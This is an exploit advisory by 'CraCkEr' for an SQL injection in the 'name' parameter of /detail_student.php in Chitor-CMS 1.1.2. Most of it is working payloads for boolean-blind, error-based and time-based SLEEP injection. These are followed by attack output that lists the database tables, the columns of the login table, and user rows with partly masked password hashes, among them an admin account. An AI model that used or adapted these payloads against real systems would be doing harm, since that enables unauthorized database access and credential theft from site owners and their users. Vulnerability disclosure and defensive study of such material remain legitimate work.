││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Vulnerability ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr :
│ Website : https://github.com/waqaskanju/Chitor-CMS │
│ Vendor : Waqas Ahmad │
│ Software : Chitor-CMS 1.1.2 │
│ Vuln Type: SQL Injection │
│ Impact : Database Access │
│ │
│────────────────────────────────────────────────────────────────────────────────────────│
│ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ │
│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │
│ data and crash the application or make it unavailable, leading to lost revenue and │
│ damage to a company's reputation. │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL
CryptoJob (Twitter) twitter.com/0x0CryptoJob
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2023 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Path: /detail_student.php
/detail_student.php?name=[SQLI]&search=Search
GET parameter 'name' is vulnerable to SQLI
---
Parameter: name (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: name=123' AND 7885=7885#&search=Search
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: name=123' AND (SELECT 9128 FROM(SELECT COUNT(*),CONCAT(0x71716b6271,(SELECT (ELT(9128=9128,1))),0x716a6b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- DaVE&search=Search
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: name=123' AND (SELECT 1784 FROM (SELECT(SLEEP(5)))AjPI)-- FsLQ&search=Search
---
GET parameter 'name' is vulnerable to SQLI
[+] Starting the Attack
fetching current database
current database: ''**********_chitor_db'
fetching tables for database: '**********_chitor_db'
Database: **********_chitor_db
[12 tables]
+-----------------+
| position |
| class_subjects |
| employees |
| login |
| marks |
| school_classes |
| schools |
| setting |
| students_info |
| subject_teacher |
| subjects |
| tab_index |
+-----------------+
fetching columns for table 'login' in database '**********_chitor_db'
Table: login
[5 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| Password | varchar(256) |
| Status | int(11) |
| Employee_Id | int(11) |
| Id | int(11) |
| User_Name | varchar(30) |
+-------------+--------------+
fetching entries of column(s) 'Employee_Id,Id,User_Name,`Password`,`Status`' for table 'login' in database '**********_chitor_db'
Table: login
[3 entries]
+----+----------+------------------------------------------+-------------+------------+
| Id | Status | Password | Employee_Id | User_Name |
+----+----------+------------------------------------------+-------------+------------+
| 1 | 1 | *****1a7fdd83dd1e2a309ce759***** (****) | 1 | Guest |
| 2 | 1 | *****82fb3cee50d9272ba79822***** | 2 | **qa*kan** |
| 3 | 1 | *****f297a57a5a743894a0e4a8***** (****) | 3 | admin |
+----+----------+------------------------------------------+-------------+------------+
[-] Done